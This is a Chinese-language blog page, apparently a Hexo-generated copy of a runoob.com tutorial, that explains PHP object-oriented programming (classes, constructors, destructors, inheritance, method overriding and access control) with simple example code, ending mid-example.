

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title> - Hexo</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="
title:phpphp教程https://www....">
  <meta name="author" content="John Doe">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="https://at.alicdn.com/t/font_1445822_p6ry5n7lrr.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      loading: {
        gif: '/images/theme/loading.gif',
        lottie: ''
      },
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: {
          gif: '/images/theme/loading.gif',
          lottie: ''
        }
      },
      donate: {
        enable: true,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '我在开了灯的床头下，想问问自己的心啊。',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: false,
        path: ''
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 6.3.0"></head>

<body class="lock-screen">
  <div class="loading" id="loading"></div>
  
    


  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title"></h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>February 21, 2024</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>15751</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        
        <hr>
<h2 id="title-php"><a href="#title-php" class="headerlink" title="title:php"></a>title:php</h2><p>php教程<a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-oop.html">https://www.runoob.com/php/php-oop.html</a></p>
<h1 id="php面向对象"><a href="#php面向对象" class="headerlink" title="php面向对象"></a>php面向对象</h1><p>面向对象（Object-Oriented，简称 OO）是一种编程思想和方法，它将程序中的数据和操作数据的方法封装在一起，形成”对象”，并通过对象之间的交互和消息传递来完成程序的功能。面向对象编程强调数据的封装、继承、多态和动态绑定等特性，使得程序具有更好的可扩展性、可维护性和可重用性。</p>
<p>在面向对象的程序设计（英语：Object-oriented programming，缩写：OOP）中，对象是一个由信息及对信息进行处理的描述所组成的整体，是对现实世界的抽象。</p>
<p>在现实世界里我们所面对的事情都是对象，如计算机、电视机、自行车等。</p>
<p><strong>对象的主要三个特性：</strong></p>
<ul>
<li>对象的行为：对象可以执行的操作，比如：开灯，关灯就是行为。</li>
<li>对象的形态：对对象不同的行为是如何响应的，比如：颜色，尺寸，外型。</li>
<li>对象的表示：对象的表示就相当于身份证，具体区分在相同的行为与状态下有什么不同。</li>
</ul>
<p>比如 Animal(动物) 是一个抽象类，我们可以具体到一只狗跟一只羊，而狗跟羊就是具体的对象，他们有颜色属性，可以写，可以跑等行为状态。</p>
<p><img    class="lazyload" data-original="https://raw.githubusercontent.com/20231201/123/main/animals.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span></p>
<p><strong>面向对象编程的三个主要特性：</strong></p>
<ul>
<li>封装（Encapsulation）：指将对象的属性和方法封装在一起，使得外部无法直接访问和修改对象的内部状态。通过使用访问控制修饰符（public、private、protected）来限制属性和方法的访问权限，从而实现封装。</li>
<li>继承（Inheritance）：指可以创建一个新的类，该类继承了父类的属性和方法，并且可以添加自己的属性和方法。通过继承，可以避免重复编写相似的代码，并且可以实现代码的重用。</li>
<li>多态（Polymorphism）：指可以使用一个父类类型的变量来引用不同子类类型的对象，从而实现对不同对象的统一操作。多态可以使得代码更加灵活，具有更好的可扩展性和可维护性。在 PHP 中，多态可以通过实现接口（interface）和使用抽象类（abstract class）来实现。</li>
</ul>
<hr>
<h2 id="面向对象内容"><a href="#面向对象内容" class="headerlink" title="面向对象内容"></a>面向对象内容</h2><ul>
<li><strong>类</strong> − 定义了一件事物的抽象特点。类的定义包含了数据的形式以及对数据的操作。</li>
<li><strong>对象</strong> − 是类的实例。</li>
<li><strong>成员变量</strong> − 定义在类内部的变量。该变量的值对外是不可见的，但是可以通过成员函数访问，在类被实例化为对象后，该变量即可成为对象的属性。</li>
<li><strong>成员函数</strong> − 定义在类的内部，可用于访问对象的数据。</li>
<li><strong>继承</strong> − 继承性是子类自动共享父类数据结构和方法的机制，这是类之间的一种关系。在定义和实现一个类的时候，可以在一个已经存在的类的基础之上来进行，把这个已经存在的类所定义的内容作为自己的内容，并加入若干新的内容。</li>
<li><strong>父类</strong> − 一个类被其他类继承，可将该类称为父类，或基类，或超类。</li>
<li><strong>子类</strong> − 一个类继承其他类称为子类，也可称为派生类。</li>
<li><strong>多态</strong> − 多态性是指相同的函数或方法可作用于多种类型的对象上并获得不同的结果。不同的对象，收到同一消息可以产生不同的结果，这种现象称为多态性。</li>
<li><strong>重载</strong> − 简单说，就是函数或者方法有同样的名称，但是参数列表不相同的情形，这样的同名不同参数的函数或者方法之间，互相称之为重载函数或者方法。</li>
<li><strong>抽象性</strong> − 抽象性是指将具有一致的数据结构（属性）和行为（操作）的对象抽象成类。一个类就是这样一种抽象，它反映了与应用有关的重要性质，而忽略其他一些无关内容。任何类的划分都是主观的，但必须与具体的应用有关。</li>
<li><strong>封装</strong> − 封装是指将现实世界中存在的某个客体的属性与行为绑定在一起，并放置在一个逻辑单元内。</li>
<li><strong>构造函数</strong> − 主要用来在创建对象时初始化对象， 即为对象成员变量赋初始值，总与new运算符一起使用在创建对象的语句中。</li>
<li><strong>析构函数</strong> − 析构函数(destructor) 与构造函数相反，当对象结束其生命周期时（例如对象所在的函数已调用完毕），系统自动执行析构函数。析构函数往往用来做”清理善后” 的工作（例如在建立对象时用new开辟了一片内存空间，应在退出前在析构函数中用delete释放）。</li>
</ul>
<p>下图中我们通过 Car 类 创建了三个对象：Mercedes, Bmw, 和 Audi。</p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs haxe"><span class="hljs-variable">$mercedes</span> = <span class="hljs-keyword">new</span> <span class="hljs-type">Car</span> ();<br><span class="hljs-variable">$bmw</span> = <span class="hljs-keyword">new</span> <span class="hljs-type">Car</span> ();<br><span class="hljs-variable">$audi</span> = <span class="hljs-keyword">new</span> <span class="hljs-type">Car</span> ();<br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://raw.githubusercontent.com/20231201/123/main/1462335800-8110-classes-and-objects.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">img</span></p>
<hr>
<h2 id="PHP-类定义"><a href="#PHP-类定义" class="headerlink" title="PHP 类定义"></a>PHP 类定义</h2><p>PHP 定义类通常语法格式如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">phpClass</span> </span>&#123;<br>  <span class="hljs-keyword">var</span> <span class="hljs-variable">$var1</span>;<br>  <span class="hljs-keyword">var</span> <span class="hljs-variable">$var2</span> = <span class="hljs-string">&quot;constant string&quot;</span>;<br>  <br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">myfunc</span> (<span class="hljs-params"><span class="hljs-variable">$arg1</span>, <span class="hljs-variable">$arg2</span></span>) </span>&#123;<br>     [..]<br>  &#125;<br>  [..]<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>解析如下：</p>
<ul>
<li>类使用 <strong>class</strong> 关键字后加上类名定义。</li>
<li>类名后的一对大括号({})内可以定义变量和方法。</li>
<li>类的变量使用 <strong>var</strong> 来声明, 变量也可以初始化值。</li>
<li>函数定义类似 PHP 函数的定义，但函数只能通过该类及其实例化的对象访问。</li>
</ul>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Site</span> </span>&#123;<br>  <span class="hljs-comment">/* 成员变量 */</span><br>  <span class="hljs-keyword">var</span> <span class="hljs-variable">$url</span>;<br>  <span class="hljs-keyword">var</span> <span class="hljs-variable">$title</span>;<br>  <br>  <span class="hljs-comment">/* 成员函数 */</span><br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">setUrl</span>(<span class="hljs-params"><span class="hljs-variable">$par</span></span>)</span>&#123;<br>     <span class="hljs-variable language_">$this</span>-&gt;url = <span class="hljs-variable">$par</span>;<br>  &#125;<br>  <br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getUrl</span>(<span class="hljs-params"></span>)</span>&#123;<br>     <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;url . PHP_EOL;<br>  &#125;<br>  <br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">setTitle</span>(<span class="hljs-params"><span class="hljs-variable">$par</span></span>)</span>&#123;<br>     <span class="hljs-variable language_">$this</span>-&gt;title = <span class="hljs-variable">$par</span>;<br>  &#125;<br>  <br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getTitle</span>(<span class="hljs-params"></span>)</span>&#123;<br>     <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;title . PHP_EOL;<br>  &#125;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>变量 <strong>$this</strong> 代表自身的对象。</p>
<p><strong>PHP_EOL</strong> 为换行符。</p>
<hr>
<h2 id="PHP-中创建对象"><a href="#PHP-中创建对象" class="headerlink" title="PHP 中创建对象"></a>PHP 中创建对象</h2><p>类创建后，我们可以使用 <strong>new</strong> 运算符来实例化该类的对象：</p>
<figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs haxe"><span class="hljs-variable">$runoob</span> = <span class="hljs-keyword">new</span> <span class="hljs-type">Site</span>;<br><span class="hljs-variable">$taobao</span> = <span class="hljs-keyword">new</span> <span class="hljs-type">Site</span>;<br><span class="hljs-variable">$google</span> = <span class="hljs-keyword">new</span> <span class="hljs-type">Site</span>;<br></code></pre></td></tr></table></figure>

<p>以上代码我们创建了三个对象，三个对象各自都是独立的，接下来我们来看看如何访问成员方法与成员变量。</p>
<h3 id="调用成员方法"><a href="#调用成员方法" class="headerlink" title="调用成员方法"></a>调用成员方法</h3><p>在实例化对象后，我们可以使用该对象调用成员方法，该对象的成员方法只能操作该对象的成员变量：</p>
<figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-comment">// 调用成员函数，设置标题和URL</span><br>$<span class="hljs-function"><span class="hljs-title">runoob</span>-&gt;</span>setTitle( <span class="hljs-string">&quot;菜鸟教程&quot;</span> );<br>$<span class="hljs-function"><span class="hljs-title">taobao</span>-&gt;</span>setTitle( <span class="hljs-string">&quot;淘宝&quot;</span> );<br>$<span class="hljs-function"><span class="hljs-title">google</span>-&gt;</span>setTitle( <span class="hljs-string">&quot;Google 搜索&quot;</span> );<br><br>$<span class="hljs-function"><span class="hljs-title">runoob</span>-&gt;</span>setUrl( <span class="hljs-string">&#x27;www.runoob.com&#x27;</span> );<br>$<span class="hljs-function"><span class="hljs-title">taobao</span>-&gt;</span>setUrl( <span class="hljs-string">&#x27;www.taobao.com&#x27;</span> );<br>$<span class="hljs-function"><span class="hljs-title">google</span>-&gt;</span>setUrl( <span class="hljs-string">&#x27;www.google.com&#x27;</span> );<br><br><span class="hljs-comment">// 调用成员函数，获取标题和URL</span><br>$<span class="hljs-function"><span class="hljs-title">runoob</span>-&gt;</span>getTitle();<br>$<span class="hljs-function"><span class="hljs-title">taobao</span>-&gt;</span>getTitle();<br>$<span class="hljs-function"><span class="hljs-title">google</span>-&gt;</span>getTitle();<br><br>$<span class="hljs-function"><span class="hljs-title">runoob</span>-&gt;</span>getUrl();<br>$<span class="hljs-function"><span class="hljs-title">taobao</span>-&gt;</span>getUrl();<br>$<span class="hljs-function"><span class="hljs-title">google</span>-&gt;</span>getUrl();<br></code></pre></td></tr></table></figure>

<p>完整代码如下：</p>
<h2 id="实例-1"><a href="#实例-1" class="headerlink" title="实例"></a>实例</h2><?php
class Site {
 /* 成员变量 */
 var $url;
 var $title;

 /* 成员函数 */
 function setUrl($par){
   $this->url = $par;
 }

 function getUrl(){
   echo $this->url . PHP_EOL;
 }

 function setTitle($par){
   $this->title = $par;
 }

 function getTitle(){
   echo $this->title . PHP_EOL;
 }
}

$runoob = new Site;
$taobao = new Site;
$google = new Site;

// 调用成员函数，设置标题和URL
$runoob->setTitle( "菜鸟教程" );
$taobao->setTitle( "淘宝" );
$google->setTitle( "Google 搜索" );

$runoob->setUrl( 'www.runoob.com' );
$taobao->setUrl( 'www.taobao.com' );
$google->setUrl( 'www.google.com' );

// 调用成员函数，获取标题和URL
$runoob->getTitle();
$taobao->getTitle();
$google->getTitle();

$runoob->getUrl();
$taobao->getUrl();
$google->getUrl();
?>


<p><a target="_blank" rel="noopener" href="https://www.runoob.com/try/runcode.php?filename=oop_demo1&type=php">运行实例 »</a></p>
<p>执行以上代码，输出结果为：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs stylus">菜鸟教程<br>淘宝<br>Google 搜索<br>www<span class="hljs-selector-class">.runoob</span><span class="hljs-selector-class">.com</span><br>www<span class="hljs-selector-class">.taobao</span><span class="hljs-selector-class">.com</span><br>www<span class="hljs-selector-class">.google</span>.com<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="PHP-构造函数"><a href="#PHP-构造函数" class="headerlink" title="PHP 构造函数"></a>PHP 构造函数</h2><p>构造函数是一种特殊的方法。主要用来在创建对象时初始化对象， 即为对象成员变量赋初始值，在创建对象的语句中与 <strong>new</strong> 运算符一起使用。</p>
<p>PHP 5 允许开发者在一个类中定义一个方法作为构造函数，语法格式如下：</p>
<figure class="highlight arcade"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arcade"><span class="hljs-keyword">void</span> __construct ([ mixed <span class="hljs-symbol">$args</span> [, $... ]] )<br></code></pre></td></tr></table></figure>

<p>在上面的例子中我们就可以通过构造方法来初始化 $url 和 $title 变量：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"> <span class="hljs-variable">$par1</span>, <span class="hljs-variable">$par2</span> </span>) </span>&#123;<br>   <span class="hljs-variable language_">$this</span>-&gt;url = <span class="hljs-variable">$par1</span>;<br>   <span class="hljs-variable language_">$this</span>-&gt;title = <span class="hljs-variable">$par2</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>现在我们就不需要再调用 setTitle 和 setUrl 方法了：</p>
<h2 id="实例-2"><a href="#实例-2" class="headerlink" title="实例"></a>实例</h2><p>$runoob &#x3D; new Site(‘<a target="_blank" rel="noopener" href="http://www.runoob.com/">www.runoob.com</a>‘, ‘菜鸟教程’);<br>$taobao &#x3D; new Site(‘<a target="_blank" rel="noopener" href="http://www.taobao.com/">www.taobao.com</a>‘, ‘淘宝’);<br>$google &#x3D; new Site(‘<a target="_blank" rel="noopener" href="http://www.google.com/">www.google.com</a>‘, ‘Google 搜索’);</p>
<p>&#x2F;&#x2F; 调用成员函数，获取标题和URL<br>$runoob-&gt;getTitle();<br>$taobao-&gt;getTitle();<br>$google-&gt;getTitle();</p>
<p>$runoob-&gt;getUrl();<br>$taobao-&gt;getUrl();<br>$google-&gt;getUrl();</p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/try/runcode.php?filename=oop_demo2&type=php">运行实例 »</a></p>
<hr>
<h2 id="析构函数"><a href="#析构函数" class="headerlink" title="析构函数"></a>析构函数</h2><p>析构函数(destructor) 与构造函数相反，当对象结束其生命周期时（例如对象所在的函数已调用完毕），系统自动执行析构函数。</p>
<p>PHP 5 引入了析构函数的概念，这类似于其它面向对象的语言，其语法格式如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">void</span> <span class="hljs-title function_">__destruct</span> <span class="hljs-params">( <span class="hljs-keyword">void</span> )</span><br></code></pre></td></tr></table></figure>

<h3 id="实例-3"><a href="#实例-3" class="headerlink" title="实例"></a>实例</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyDestructableClass</span> </span>&#123;<br>   <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>) </span>&#123;<br>       <span class="hljs-keyword">print</span> <span class="hljs-string">&quot;构造函数\n&quot;</span>;<br>       <span class="hljs-variable language_">$this</span>-&gt;name = <span class="hljs-string">&quot;MyDestructableClass&quot;</span>;<br>   &#125;<br><br>   <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>       <span class="hljs-keyword">print</span> <span class="hljs-string">&quot;销毁 &quot;</span> . <span class="hljs-variable language_">$this</span>-&gt;name . <span class="hljs-string">&quot;\n&quot;</span>;<br>   &#125;<br>&#125;<br><br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">MyDestructableClass</span>();<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>执行以上代码，输出结果为：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs">构造函数<br>销毁 MyDestructableClass<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="继承"><a href="#继承" class="headerlink" title="继承"></a>继承</h2><p>PHP 使用关键字 <strong>extends</strong> 来继承一个类，PHP 不支持多继承，格式如下：</p>
<figure class="highlight scala"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs scala"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Child</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Parent</span> </span>&#123;<br>   <span class="hljs-comment">// 代码部分</span><br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="实例-4"><a href="#实例-4" class="headerlink" title="实例"></a>实例</h3><p>实例中 Child_Site 类继承了 Site 类，并扩展了功能：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-comment">// 子类扩展站点类别</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Child_Site</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Site</span> </span>&#123;<br>   <span class="hljs-keyword">var</span> <span class="hljs-variable">$category</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">setCate</span>(<span class="hljs-params"><span class="hljs-variable">$par</span></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;category = <span class="hljs-variable">$par</span>;<br>    &#125;<br>  <br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getCate</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;category . PHP_EOL;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="方法重写"><a href="#方法重写" class="headerlink" title="方法重写"></a>方法重写</h2><p>如果从父类继承的方法不能满足子类的需求，可以对其进行改写，这个过程叫方法的覆盖（override），也称为方法的重写。</p>
<p>实例中重写了 getUrl 与 getTitle 方法：</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs kotlin">function getUrl() &#123;<br>   echo $<span class="hljs-keyword">this</span>-&gt;url . PHP_EOL;<br>   <span class="hljs-keyword">return</span> $<span class="hljs-keyword">this</span>-&gt;url;<br>&#125;<br>   <br>function getTitle()&#123;<br>   echo $<span class="hljs-keyword">this</span>-&gt;title . PHP_EOL;<br>   <span class="hljs-keyword">return</span> $<span class="hljs-keyword">this</span>-&gt;title;<br>&#125;<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="访问控制"><a href="#访问控制" class="headerlink" title="访问控制"></a>访问控制</h2><p>PHP 对属性或方法的访问控制，是通过在前面添加关键字 public（公有），protected（受保护）或 private（私有）来实现的。</p>
<ul>
<li><strong>public（公有）：</strong>公有的类成员可以在任何地方被访问。</li>
<li><strong>protected（受保护）：</strong>受保护的类成员则可以被其自身以及其子类和父类访问。</li>
<li><strong>private（私有）：</strong>私有的类成员则只能被其定义所在的类访问。</li>
</ul>
<h3 id="属性的访问控制"><a href="#属性的访问控制" class="headerlink" title="属性的访问控制"></a>属性的访问控制</h3><p>类属性必须定义为公有，受保护，私有之一。如果用 var 定义，则被视为公有。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * Define MyClass</span><br><span class="hljs-comment"> */</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$public</span> = <span class="hljs-string">&#x27;Public&#x27;</span>;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-variable">$protected</span> = <span class="hljs-string">&#x27;Protected&#x27;</span>;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$private</span> = <span class="hljs-string">&#x27;Private&#x27;</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">printHello</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">public</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">protected</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">private</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">MyClass</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj</span>-&gt;<span class="hljs-keyword">public</span>; <span class="hljs-comment">// 这行能被正常执行</span><br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj</span>-&gt;<span class="hljs-keyword">protected</span>; <span class="hljs-comment">// 这行会产生一个致命错误</span><br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj</span>-&gt;<span class="hljs-keyword">private</span>; <span class="hljs-comment">// 